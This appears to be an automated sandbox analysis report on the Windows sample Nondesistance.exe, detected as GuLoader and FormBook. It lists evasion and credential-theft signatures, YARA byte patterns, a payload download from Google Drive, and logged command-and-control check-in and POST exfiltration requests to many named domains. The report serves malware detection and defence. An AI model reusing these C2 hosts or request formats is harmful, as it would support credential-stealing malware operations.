Windows Analysis Report
Nondesistance.exe

Overview

General Information

Sample name: Nondesistance.exe
Analysis ID: 1447915
MD5: 9695b61f42f2e5a77e2e8d29963fe980
SHA1: 92396f929ffc0ec1c2929dcba7fa2b3de5859bc0
SHA256: 1c6b868bda50a13de084c97460436742b1636b75e60708eeecb9c44d574ccce9

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • Nondesistance.exe (PID: 2812 cmdline: "C:\Users\user\Desktop\Nondesistance.exe" MD5: 9695B61F42F2E5A77E2E8D29963FE980)
    • Nondesistance.exe (PID: 772 cmdline: "C:\Users\user\Desktop\Nondesistance.exe" MD5: 9695B61F42F2E5A77E2E8D29963FE980)
      • jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe (PID: 7584 cmdline: "C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 5860 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • firefox.exe (PID: 7336 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: D1CC73370B9EF7D74E6D9FD9248CD687)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2a3f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13a3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2a3f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13a3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
        No Sigma rule has matched

        AV Detection

        Source: Nondesistance.exe, Avira: detected
        Source: http://www.donantedeovulos.space/udud/, Avira URL Cloud: Label: malware
        Source: http://www.donantedeovulos.space/udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG, Avira URL Cloud: Label: malware
        Source: Nondesistance.exe, ReversingLabs: Detection: 50%
        Source: Nondesistance.exe, Virustotal: Detection: 56%
        Source: Yara match, File source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Nondesistance.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknown, HTTPS traffic detected: 142.251.16.101:443 -> 192.168.11.30:49827 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 172.253.62.132:443 -> 192.168.11.30:49828 version: TLS 1.2
        Source: Nondesistance.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: write.pdbGCTL source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021CB000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: write.pdb source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021CB000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033001346.0000000000C3E000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: wntdll.pdbUGP source: Nondesistance.exe, 00000009.00000003.20300365198.000000003216B000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20303958082.0000000032316000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004B7D000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20394487085.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20391249832.00000000046FE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004A50000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Nondesistance.exe, Nondesistance.exe, 00000009.00000003.20300365198.000000003216B000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20303958082.0000000032316000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004B7D000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20394487085.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20391249832.00000000046FE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004A50000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmp
        Source: C:\Users\user\Desktop\Nondesistance.exe, Code function: 4_2_00406033 FindFirstFileA,FindClose, 4_2_00406033
        Source: C:\Users\user\Desktop\Nondesistance.exe, Code function: 4_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_004055D1
        Source: C:\Users\user\Desktop\Nondesistance.exe, Code function: 4_2_00402688 FindFirstFileA, 4_2_00402688
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, Code function: 4x nop then pop edi, 10_2_00603851
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, Code function: 4x nop then mov esp, ebp, 10_2_00601267
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, Code function: 4x nop then pop ebx, 10_2_0060322B
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, Code function: 4x nop then xor eax, eax, 10_2_00606AD0
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, Code function: 4x nop then mov esp, ebp, 10_2_006012BF
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, Code function: 4x nop then pop edi, 10_2_00602550
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, Code function: 4x nop then pop edi, 10_2_006025AE
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, Code function: 4x nop then pop edi, 10_2_00602580

        Networking

        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49926 -> 64.190.62.22:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49927 -> 3.73.27.108:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49928 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49929 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49930 -> 183.111.161.243:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49931 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49932 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49933 -> 185.253.215.17:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49934 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49936 -> 208.112.85.150:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49937 -> 208.112.85.150:80
        Source: Joe Sandbox ViewIP Address: 208.112.85.150 208.112.85.150
        Source: Joe Sandbox ViewIP Address: 79.98.25.1 79.98.25.1
        Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
        Source: Joe Sandbox ViewASN Name: LNH-INCUS LNH-INCUS
        Source: Joe Sandbox ViewASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT
        Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
        Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.fivetownsjcc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.maxiwalls.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.donantedeovulos.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=hGFabcFIFCLvltCtmr9HP7OROVYI8jz1wRRIKEqq2n4QXlxpqgeqG0CRvdN+pVKSvdVheptlxRG17ghg7M8WhiuOrvxilzcVqEvqLqvxpfLmNTwCuTHyXsI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.valentinaetommaso.itAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.funtechie.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.l7aeh.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.grimfilm.co.krAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.mindfreak.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=CE5650FDbfXnpQA/eK0NgrbRbNtPjFAUxQ7joq83O2JD2van08dDJXT7jPsZwBcB76Ina7ciMfrueGFKvr7HGptlhVNK1F0UnKlYvzZl0mKZiEoX7KROJkU=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.avocatmh.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=0fut0+GuUFbft3VBL5xm0Hp90TDKfhipdS4VXGxzAEleMWehH5gQwP182GbMnYpRKYVXdyZjU035jwIjvCFAGk2/B20KDJmRwuIeT4QhTHXMvWA5X1/HJWk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.lm2ue.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=o//LU1QIruq3a+llS5WSA3MhPk/fn3r1eotnxTFa/e8OUp/jL5i10F1rY2VLIPDErdjGMTht5s2Ux60YHU9QFnGu9iPsukiHU979EPg7OqcwQWhMz0uyXSg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.noispisok.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=JeW1ywHbInp/iudCt0BoISDa+lnGE8/XYCCr+igFIIlNiJFqeEfQ/jwRjatbRGfuzAuKF9+1993CsJcrjcNhPJvZ+1kkeDtgpfW+DhUrRm2QAt+ZR6HWj8c=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.uhahiq.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?pzH0=GNw0Cp4PdpF&Pl9P8ldX=NYPylna2Z9eGKk0n2zL98jmopuuDXUwTW1hg/NJ4dH1aG6U36Zymeq8Q+jA5ULsRtwMU5Sxc1U1KJPrtknew8LZ9GrpjSEZ/84zq63NvruY/sq3UYTRA7EE= HTTP/1.1Host: www.wp-bits.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=lxKI396dcfUopLOCgIwHig2W2DxUvRX97MJRzioDZqj6Mq9AZ90i2wJz7BzjxOGPWVxSz39xtFFcwgb3QegZat7wpytzNwJDmdPz0ImKOxyDMBvGUlbFyek=&pzH0=GNw0Cp4PdpF HTTP/1.1Host: www.academynadpo.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA= HTTP/1.1Host: www.funtechie.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=s4Vg1LN8KF8xRZjsTtx1ePAa6rrZ5tQl+fVkjM0Cwqz81ntfAq/M/gVPDnM69uqRMv9oQTSMlpkV8bcLOwxh9sPoo9S5h5afGeOqgp9TfQfssWCdBUAOLW8= HTTP/1.1Host: www.gaglianoart.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo= HTTP/1.1Host: www.fivetownsjcc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: global trafficDNS traffic detected: DNS query: www.fivetownsjcc.com
        Source: global trafficDNS traffic detected: DNS query: www.maxiwalls.com
        Source: global trafficDNS traffic detected: DNS query: www.donantedeovulos.space
        Source: global trafficDNS traffic detected: DNS query: www.valentinaetommaso.it
        Source: global trafficDNS traffic detected: DNS query: www.cookedatthebottom.com
        Source: global trafficDNS traffic detected: DNS query: www.funtechie.top
        Source: global trafficDNS traffic detected: DNS query: www.l7aeh.us
        Source: global trafficDNS traffic detected: DNS query: www.grimfilm.co.kr
        Source: global trafficDNS traffic detected: DNS query: www.mindfreak.live
        Source: global trafficDNS traffic detected: DNS query: www.ntt.creditcard
        Source: global trafficDNS traffic detected: DNS query: www.avocatmh.org
        Source: global trafficDNS traffic detected: DNS query: www.lm2ue.us
        Source: global trafficDNS traffic detected: DNS query: www.noispisok.com
        Source: global trafficDNS traffic detected: DNS query: www.578tt67.com
        Source: global trafficDNS traffic detected: DNS query: www.uhahiq.com
        Source: global trafficDNS traffic detected: DNS query: www.weave.game
        Source: global trafficDNS traffic detected: DNS query: www.wp-bits.online
        Source: global trafficDNS traffic detected: DNS query: www.academynadpo.ru
        Source: global trafficDNS traffic detected: DNS query: www.quantumpowerlife.com
        Source: global trafficDNS traffic detected: DNS query: www.osbornesargent.co.uk
        Source: global trafficDNS traffic detected: DNS query: www.4-94.productions
        Source: global trafficDNS traffic detected: DNS query: www.gast.com.pl
        Source: global trafficDNS traffic detected: DNS query: www.gaglianoart.com
        Source: unknownHTTP traffic detected: POST /udud/ HTTP/1.1Host: www.maxiwalls.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.maxiwalls.comReferer: http://www.maxiwalls.com/udud/Content-Length: 205Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Data Raw: 50 6c 39 50 38 6c 64 58 3d 7a 35 48 41 4c 31 4c 56 4e 6b 42 6d 55 41 42 31 62 33 38 31 41 32 70 45 61 2b 6f 33 68 75 47 54 36 62 78 50 52 67 55 52 4d 66 71 55 66 76 4b 63 6c 69 69 4d 68 36 62 30 42 4c 59 35 4f 36 34 45 73 73 55 64 4b 6e 4e 50 46 66 42 77 72 45 41 64 6e 6d 75 55 6c 33 6c 6a 67 51 6e 35 46 37 43 48 37 52 64 31 70 44 64 49 2f 78 32 58 39 36 6b 57 43 78 4b 32 32 6f 32 46 74 65 32 48 66 4d 31 2b 47 6d 72 38 61 79 43 58 6f 49 7a 75 7a 6c 38 61 32 73 47 4d 72 51 74 49 30 71 69 74 73 6d 58 45 44 4a 65 75 31 44 5a 53 63 74 77 30 52 44 4f 76 4c 2b 51 43 37 6f 4f 33 47 4a 4f 4f 42 78 48 79 34 41 3d 3d Data Ascii: Pl9P8ldX=z5HAL1LVNkBmUAB1b381A2pEa+o3huGT6bxPRgURMfqUfvKcliiMh6b0BLY5O64EssUdKnNPFfBwrEAdnmuUl3ljgQn5F7CH7Rd1pDdI/x2X96kWCxK22o2Fte2HfM1+Gmr8ayCXoIzuzl8a2sGMrQtI0qitsmXEDJeu1DZSctw0RDOvL+QC7oO3GJOOBxHy4A==
